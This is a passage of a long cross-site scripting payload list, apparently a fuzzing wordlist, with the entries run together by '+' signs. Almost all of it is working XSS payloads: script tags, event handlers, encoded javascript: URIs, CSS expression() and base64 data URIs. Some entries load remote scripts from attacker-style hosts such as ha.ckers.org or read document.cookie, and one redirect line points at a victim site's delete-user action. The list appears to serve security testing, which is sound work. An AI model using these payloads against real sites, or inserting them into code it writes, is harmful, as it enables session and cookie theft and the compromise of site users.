ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="jav&#65ascript:javascript:alert(1)">test1</a> +<a href="jav&#97ascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<BASE HREF="javascript:alert('XSS');//"> + <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> + <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +<A HREF="http://1113982867/">XSS</A> +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> +<iframe src="&Tab;javascript:prompt(1)&Tab;"> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt >alert&lpar;1&rpar; {Opera} +<img/src=`` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=``&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /**/>/**/alert(1)/**/</script /**/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'> +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe// src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +'';!--"<XSS>=&{()} +'>//\\,<'>">">"*" +'); alert('XSS +<script>alert(1);</script> +<script>alert('XSS');</script> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<scr<script>ipt>alert('XSS');</scr</script>ipt> +<script>alert(String.fromCharCode(88,83,83))</script> +<img src=foo.png onerror=alert(/xssed/) /> +<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> +<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> +<marquee><script>alert('XSS')</script></marquee> +<IMG SRC=\"jav&#x09;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +"><script>alert(0)</script> +<script src=http://yoursite.com/your_files.js></script> +</title><script>alert(/xss/)</script> +</textarea><script>alert(/xss/)</script> +<IMG LOWSRC=\"javascript:alert('XSS')\"> +<IMG DYNSRC=\"javascript:alert('XSS')\"> +<font style='color:expression(alert(document.cookie))'> +<img src="javascript:alert('XSS')"> +<script language="JavaScript">alert('XSS')</script> +<body onunload="javascript:alert('XSS');"> +<body onLoad="alert('XSS');" +[color=red' onmouseover="alert('xss')"]mouse over[/color] +"/></a></><img src=1.gif onerror=alert(1)> +window.alert("Bonjour !"); +<div style="x:expression((window.r==1)?'':eval('r=1; +alert(String.fromCharCode(88,83,83));'))"> +<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> +"><script alert(String.fromCharCode(88,83,83))</script> +'>><marquee><h1>XSS</h1></marquee> +'">><script>alert('XSS')</script> +'">><marquee><h1>XSS</h1></marquee> +<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> +<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> +<script>var var = 1; alert(var)</script> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<?='<SCRIPT>alert("XSS")</SCRIPT>'?> +<IMG SRC='vbscript:msgbox(\"XSS\")'> +" onfocus=alert(document.domain) "> <" +<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> +<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS +perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out +perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out +<br size=\"&{alert('XSS')}\"> +<scrscriptipt>alert(1)</scrscriptipt> +</br style=a:expression(alert())> +</script><script>alert(1)</script> +"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +[color=red width=expression(alert(123))][color] +<BASE HREF="javascript:alert('XSS');//"> +Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +"></iframe><script>alert(123)</script> +<body onLoad="while(true) alert('XSS');"> +'"></title><script>alert(1111)</script> +</textarea>'"><script>alert(document.cookie)</script> +'""><script language="JavaScript"> alert('X \nS \nS');</script> +</script></script><<<<script><>>>><<<script>alert(123)</script> +<html><noalert><noscript>(123)</noscript><script>(123)</script> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +'></select><script>alert(123)</script> +'>"><script src = 'http://www.site.com/XSS.js'></script> +}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> +<SCRIPT>document.write("XSS");</SCRIPT> +a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); +='><script>alert("xss")</script> +<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> +<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> +">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> +">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> +src="http://www.site.com/XSS.js"></script> +data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= +!--" /><script>alert('xss');</script> +<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> +"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> +'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> +<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> +<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> +"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> +'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> +<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> +'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' +"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" +\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' +http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? +http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? +'); alert('xss'); var x=' +\\'); alert(\'xss\');var x=\' +//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); +>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> +<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> +</body> +</html> +<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> +<SCRIPT> alert(“XSS”); </SCRIPT> +<BODY ONLOAD=alert("XSS")> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG SRC="javascript:alert('XSS');"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<IFRAME SRC=”http://hacker-site.com/xss.html”> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> +<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> +&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; +&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()} +&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt; +&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; +&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt; +&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt; +&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt; +&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt; +&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt; +&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt; +&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt; +&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG 